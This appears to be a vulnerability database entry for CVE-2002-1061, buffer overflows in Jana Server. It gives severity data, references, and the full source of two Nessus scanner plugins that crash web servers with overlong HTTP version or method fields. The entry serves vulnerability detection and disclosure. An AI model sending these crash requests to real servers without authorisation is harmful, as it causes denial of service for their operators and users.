Vulnerabilities > CVE-2002-1061 - Buffer Overflow vulnerability in T. Hauck Jana web Server
Attack vector
NETWORK Attack complexity
LOW Privileges required
NONE Confidentiality impact
PARTIAL Integrity impact
PARTIAL Availability impact
PARTIAL Summary
Multiple buffer overflows in Thomas Hauck Jana Server 2.x through 2.2.1, and 1.4.6 and earlier, allow remote attackers to cause a denial of service and possibly execute arbitrary code via (1) an HTTP GET request with a long major version number, (2) an HTTP GET request to the HTTP proxy on port 3128 with a long major version number, (3) a long OK reply from a POP3 server, and (4) a long SMTP server response.
Vulnerable Configurations
Part | Description | Count |
---|---|---|
Application | 7 |
Nessus
NASL family Web Servers NASL id WWW_TOO_LONG_VERSION.NASL description It was possible to kill the web server by sending an HTTP GET request with a long major version number. An attacker may exploit this vulnerability to make your web server crash continually or even execute arbitrary code on your system. last seen 2020-06-02 modified 2002-08-06 plugin id 11061 published 2002-08-06 reporter This script is Copyright (C) 2002-2020 and is owned by Tenable, Inc. or an Affiliate thereof. source https://www.tenable.com/plugins/nessus/11061 title Web Server HTTP GET Request Version Number Handling Remote Overflow code # # (C) Tenable Network Security, Inc. # # References: # Date: Fri, 26 Jul 2002 12:12:45 +0400 # From: "3APA3A" <[email protected]> # To: [email protected] # Subject: SECURITY.NNOV: multiple vulnerabilities in JanaServer # # Affected: # JanaServer 2.2.1 and prior # JanaServer 1.46 and prior # include("compat.inc"); if (description) { script_id(11061); script_version("1.36"); script_set_attribute(attribute:"plugin_modification_date", value:"2020/06/01"); script_cve_id("CVE-2002-1061"); script_bugtraq_id(5319, 5320, 5322, 5324); script_name(english:"Web Server HTTP GET Request Version Number Handling Remote Overflow"); script_summary(english:"Tries to crash the web server with a long HTTP version"); script_set_attribute(attribute:"synopsis", value: "The remote host is running a web server with a remote buffer overflow vulnerability."); script_set_attribute(attribute:"description", value: "It was possible to kill the web server by sending an HTTP GET request with a long major version number. An attacker may exploit this vulnerability to make your web server crash continually or even execute arbitrary code on your system."); script_set_attribute(attribute:"see_also", value:"https://seclists.org/bugtraq/2002/Jul/329"); script_set_attribute(attribute:"solution", value:"Upgrade your software or protect it with a filtering reverse proxy."); script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P"); script_set_cvss_temporal_vector("CVSS2#E:U/RL:OF/RC:C"); script_set_attribute(attribute:"exploitability_ease", value:"No known exploits are available"); script_set_attribute(attribute:"exploit_available", value:"false"); script_set_attribute(attribute:"vuln_publication_date", value:"2003/07/28"); script_set_attribute(attribute:"plugin_publication_date", value:"2002/08/06"); script_set_attribute(attribute:"potential_vulnerability", value:"true"); script_set_attribute(attribute:"plugin_type", value:"remote"); script_end_attributes(); script_category(ACT_DENIAL); # All the www_too_long_*.nasl scripts were first declared as # ACT_DESTRUCTIVE_ATTACK, but many web servers are vulnerable to them: # The web server might be killed by those generic tests before Nessus # has a chance to perform known attacks for which a patch exists # As ACT_DENIAL are performed one at a time (not in parallel), this reduces # the risk of false positives. script_copyright(english:"This script is Copyright (C) 2002-2020 and is owned by Tenable, Inc. or an Affiliate thereof."); script_family(english:"Web Servers"); script_dependencies("no404.nasl", "http_version.nasl"); script_require_keys("Settings/ParanoidReport"); script_require_ports("Services/www", 80); exit(0); } include("audit.inc"); include("global_settings.inc"); include("misc_func.inc"); include("http.inc"); if (report_paranoia < 2) audit(AUDIT_PARANOID); r = string("GET / HTTP/", crap(2048), ".O\r\n\r\n"); port = get_http_port(default:80); if(http_is_dead(port:port))exit(0); w = http_send_recv_buf(port: port, data: r); if(http_is_dead(port: port, retry: 3)) { security_hole(port); }
NASL family Web Servers NASL id WWW_TOO_LONG_METHOD.NASL description It was possible to kill the web server by sending an invalid request with a long HTTP method field. A remote attacker may exploit this vulnerability to make the web server crash continually or possibly execute arbitrary code. last seen 2020-06-01 modified 2020-06-02 plugin id 11065 published 2002-08-06 reporter This script is Copyright (C) 2002-2018 Tenable Network Security, Inc. source https://www.tenable.com/plugins/nessus/11065 title Web Server HTTP Method Handling Remote Overflow code # # (C) Tenable Network Security, Inc. # # Script audit and contributions from Carmichael Security # Erik Anderson <[email protected]> (nb: domain no longer exists) # Added BugtraqID and CAN # include("compat.inc"); if (description) { script_id(11065); script_version("1.35"); script_cvs_date("Date: 2018/11/15 20:50:26"); script_cve_id("CVE-2002-1061"); script_bugtraq_id(5319); script_name(english:"Web Server HTTP Method Handling Remote Overflow"); script_summary(english:"Tries to crash the web server with a long HTTP method"); script_set_attribute(attribute:"synopsis", value: "The remote host is running a web server with a remote buffer overflow vulnerability."); script_set_attribute(attribute:"description", value: "It was possible to kill the web server by sending an invalid request with a long HTTP method field. A remote attacker may exploit this vulnerability to make the web server crash continually or possibly execute arbitrary code."); script_set_attribute(attribute:"see_also", value:"https://seclists.org/bugtraq/2002/Jul/329"); script_set_attribute(attribute:"solution", value:"Upgrade your software or protect it with a filtering reverse proxy."); script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P"); script_set_cvss_temporal_vector("CVSS2#E:U/RL:OF/RC:C"); script_set_attribute(attribute:"exploitability_ease", value:"No known exploits are available"); script_set_attribute(attribute:"exploit_available", value:"false"); script_set_attribute(attribute:"vuln_publication_date", value:"2003/07/28"); script_set_attribute(attribute:"plugin_publication_date", value:"2002/08/06"); script_set_attribute(attribute:"potential_vulnerability", value:"true"); script_set_attribute(attribute:"plugin_type", value:"remote"); script_end_attributes(); script_family(english:"Web Servers"); script_category(ACT_DENIAL); # All the www_too_long_*.nasl scripts were first declared as # ACT_DESTRUCTIVE_ATTACK, but many web servers are vulnerable to them: # The web server might be killed by those generic tests before Nessus # has a chance to perform known attacks for which a patch exists # As ACT_DENIAL are performed one at a time (not in parallel), this reduces # the risk of false positives. script_copyright(english:"This script is Copyright (C) 2002-2018 Tenable Network Security, Inc."); script_dependencies("httpver.nasl", "http_version.nasl", "no404.nasl"); script_require_keys("Settings/ParanoidReport"); script_require_ports("Services/www", 80); exit(0); } include("audit.inc"); include("global_settings.inc"); include("misc_func.inc"); include("http.inc"); if (report_paranoia < 2) audit(AUDIT_PARANOID); m = crap(data:"HEADNESSUSNESSUS", length: 2048); port = get_http_port(default:80); if (http_is_dead(port: port)) exit(0); w = http_send_recv3(method: m, item: "/", port: port); if (http_is_dead(port: port, retry: 3)) security_hole(port);
References
- http://archives.neohapsis.com/archives/bugtraq/2002-07/0329.html
- http://www.iss.net/security_center/static/9682.php
- http://www.iss.net/security_center/static/9683.php
- http://www.iss.net/security_center/static/9685.php
- http://www.iss.net/security_center/static/9686.php
- http://www.securityfocus.com/bid/5319
- http://www.securityfocus.com/bid/5320
- http://www.securityfocus.com/bid/5322
- http://www.securityfocus.com/bid/5324